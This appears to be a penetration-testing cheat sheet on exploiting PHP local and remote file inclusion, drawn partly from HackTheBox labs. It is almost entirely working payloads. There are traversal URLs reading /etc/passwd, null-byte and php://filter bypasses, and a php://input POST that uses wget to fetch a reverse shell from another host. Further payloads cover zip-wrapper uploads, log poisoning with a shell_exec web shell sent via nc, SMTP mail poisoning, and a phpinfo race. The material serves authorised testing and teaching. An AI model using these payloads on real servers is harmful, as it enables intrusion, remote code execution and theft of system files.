PHP - LFI and RFI

How to Exploit PHP LFI/RFI and Methods:

1) Basic Local File Inclusion and Remote File Inclusion 2) Null Byte 3) Base64 Encoded 4) PHP Input Wrapper 5) PHP Zip Wrapper 6) proc/self/environ 7) Log File Contamination 8) Email Revese Shell 9) phpinfo LFI

Basic Local File Inclusion and Remote File Inclusion

http://example.com/script.php?page=../../../../../../../../etc/passwd

http://example.com/script.php?language=/etc/passwd

Null Byte

# On PHP 5.3 and below, you can use Null Byte %00 to bypass php from appending .php extensions
http://example.com/script.php?language=/etc/passwd%00

# Another way to deal with this is to use the ? (question mark) in order to make the rest of the strings to be interpreted as a parameter. 
# Also try %2500  
http://example.com/script.php?language=/etc/passwd?

Base64 Encoded

index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

index.php?page=php://filter/convert.base64-encode/resource=index.php

PHP Input Wrapper - POST Example 1:

http://192.168.183.128/fileincl/example1.php?page=php://input
# POST Data would be something like this:
<? system('wget http://192.168.183.129/php-reverse-shell.php -O /var/www/shell.php');?>  

# After uploading execute the reverse shell at:
http://192.168.183.129/shell.php

Example 2:

PHP Zip Wrapper

The zip wrapper processes uploaded .zip files server side allowing a penetration tester to upload a zip file using a vulnerable file upload function and leverage he zip filter via an LFI to execute. A typical attack example would look like:

1. Create a PHP reverse shell 2. Compress to a .zip file 3. Upload the compressed shell payload to the server 4. Use the zip wrapper to extract the payload using: 

php?page=zip://path/to/file.zip%23shell

5. The above will extract the zip file to shell, if the server does not append .php rename it to shell.php instead

proc/self/environ

/proc/self/environ
# If the above works and we have access to the file... then you can do this via the User Agent:  
User Agent: <?php echo "Hello"; ?>

Log File Contamination

nc -nv 10.10.10.35 80
<?php echo shell_exec($_GET['cmd']);?>

# To execute it:
http://10.10.10.7/vuln.php?page=../../../../../../../../../var/log/apache2/access.log%00&cmd=ipconfig

Email Revese Shell

 telnet 10.10.10.7 25
 EHLO ippsec.beep.htb
 VRFY asterisk@localhost
 ### if successful, then:
 mail from:pwned@haha.io
 rcpt to: asterisk@localhost
 data
 Subject: You have been pwned
 <? echo system($_REQUEST['ipp']); ?>

.

# Don't forget the . (dot) above
# Then:
 http://10.10.10.7/vuln.php?page=../../../../../../../../../var/mail/asterisk%00&ipp=whoami

phpinfo() LFI

1 - Check if upload is enabled

 GET /phpinfo.php HTTP/1.1

2 - Execute the POST with Content Type and check for PHP variables. Below are two examples.

Example 1 from the documentation:

Example 2 from IPPSEC - POISON

2 - The script is located at PayLoadAllTheThings - PHP LFI Path.

# Must change:
 - PAYLOAD
 - URI
 - [tmp_name] => TO [tmp_name] =&gt

3 - Start the listener and get it done

References: https://secf00tprint.github.io/blog/payload-tester/lfirfi/en https://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/ https://highon.coffee/blog/lfi-cheat-sheet/ https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

PreviousExploiting RFI in a PHP application and bypassing remote URL inclusion restrictNextSQL Injection

Last updated